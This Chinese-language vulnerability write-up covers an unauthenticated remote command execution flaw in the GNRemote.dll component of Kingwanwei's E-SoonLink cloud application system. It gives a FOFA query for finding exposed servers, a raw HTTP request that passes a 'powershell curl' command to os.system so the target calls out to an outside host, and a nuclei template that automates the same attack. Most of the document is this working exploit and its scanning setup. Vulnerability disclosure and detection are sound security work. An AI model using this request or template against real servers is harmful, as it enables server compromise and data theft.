金万维异速联云联应用系统GNRemote存在远程命令执行漏洞
EA一、漏洞简介
金万维异速联E-SoonLink,是国内领先的远程接入、移动办公、应用虚拟化等软件平台,金万维异速联云联应用系统远程命令执行漏洞利用难度极低,可在未登录的状态下直接发送恶意请求包造成利用,可能被蠕虫、黑客组织批量利用,造成海量敏感信息泄漏、服务器失陷。
二、影响版本
- 云联应用系统
三、资产测绘
- fofa
title="云联应用系统接入平台"
- 特征
四、漏洞复现
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+akuyfhpxbo.dgrh3.cn HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
nuclei
id: jinwanwei_GNRemote_rce
info:
name: jinwanwei_GNRemote_rce
author: xiaokp7
severity: critical
description: 金万维异速联云联应用系统GNRemote.dll 存在远程命令执行漏洞
http:
- raw:
- |+
@timeout: 30s
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# Generated From WebFuzzer on 2024-04-18 09:43:10